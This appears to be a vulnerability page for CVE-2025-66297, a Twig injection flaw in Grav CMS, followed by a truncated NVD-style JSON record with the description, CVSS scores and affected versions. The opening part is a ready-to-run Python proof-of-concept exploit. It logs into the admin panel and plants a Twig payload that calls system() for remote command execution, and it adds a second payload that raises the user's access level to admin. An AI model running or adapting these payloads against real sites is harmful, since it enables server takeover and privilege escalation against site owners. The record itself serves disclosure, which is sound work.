CVE-2025-66297

# CVE-2025-66297 PoC - Grav CMS Twig Injection # This PoC demonstrates privilege escalation and RCE via Twig injection # Step 1: Create a page with malicious Twig in frontmatter import requests target_url = "http://target-grav-site.com" login_url = f"{target_url}/admin" page_create_url = f"{target_url}/admin/pages" # Authentication session = requests.Session() login_data = { "username": "attacker", "password": "password123" } session.post(login_url, data=login_data) # Step 2: Create page with Twig injection payload page_data = { "frontmatter": """--- title: Test Page twig: true --- {{['id']|map('system')|join('')}} # RCE via Twig """, "content": "Malicious content" } response = session.post(page_create_url, data=page_data) # Step 3: Access the crafted page to trigger RCE malicious_page_url = f"{target_url}/test-page" response = session.get(malicious_page_url) # Alternative: Privilege Escalation payload priv_esc_payload = """--- title: PrivEsc Test twig: true --- {{user.username}} # Information disclosure {% do user.setAccessLevel('admin') %} # Privilege escalation """

{"cve": {"id": "CVE-2025-66297", "sourceIdentifier": "[email protected]", "published": "2025-12-01T21:15:53.327", "lastModified": "2025-12-03T15:58:41.680", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Grav is a file-based Web platform. Prior to 1.8.0-beta.27, a user with admin panel access and permissions to create or edit pages in Grav CMS can enable Twig processing in the page frontmatter. By injecting malicious Twig expressions, the user can escalate their privileges to admin or execute arbitrary system commands via the scheduler API. This results in both Privilege Escalation (PE) and Remote Code Execution (RCE) vulnerabilities. This vulnerability is fixed in 1.8.0-beta.27."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1336"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.8.0", "matchCriteriaId": "0F068841-DBCC-41D5-8B24-BFCE51841E2E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "8A383F2E-C6BA-440B-B648-A3313B7D91C3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta10:*:*:*:*:*:*", "matchCriteriaId": "F7EF2DEC-2798-4D0D-9C27-0F01BAFEAEFD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta11:*:*:*:*:*:*", "matchCriteriaId": "530C6F64-F30B-4E93-9A12-D9625EA57483"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta12:*:*:*:*:*:*", "matchCriteriaId": "9AC28BF9-626D-4514-91F0-F81DAB5D3602"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta13:*:*:*:*:*:*", "matchCriteriaId": "307AA375-E531-4AE5-BA79-2F9D4DE7A05F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta14:*:*:*:*:*:*", "matchCriteriaId": "C2E3E312-485D-42B0-B465-64B6438CDCAE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta15:*:*:*:*:*:*", "matchCriteriaId": "5BE4B2F9-1B6D-4D18-916A-5C95A3213222"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta16:*:*:*:*:*:*", "matchCriteriaId": "763207F0-92D1-4274-A30A-DE634C5852C3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta17:*:*:*:*:*:*", "matchCriteriaId": "1DE8F350-BA07-4DAA-AE4B-5E0A532B6828"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta18:*:*:*:*:*:*", "matchCriteriaId": "F9150B94-0DF3-43F3-9806-39787A6C0E4D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta19:*:*:*:*:*:*", "matchCriteriaId": "BAA7C7EC-8FB2-445D-8A02-1743D87F5416"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "7A6BEA2A-D534-4C9E-811A-8A46E214C46D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:1.8.0:beta20:*:*:*:*:*:*", "matchCriteriaId": " ... (truncated)